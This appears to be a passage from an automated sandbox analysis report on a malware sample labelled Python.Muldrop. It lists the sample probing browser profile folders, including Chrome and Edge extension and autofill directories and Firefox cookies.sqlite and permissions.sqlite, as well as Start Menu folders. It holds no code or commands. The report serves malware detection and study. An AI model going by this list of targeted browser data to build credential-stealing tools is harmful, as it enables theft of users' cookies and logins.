              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\21262822-6a68-4458-bd75-71865ae821a7 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite VolumeInformationJump to behavior
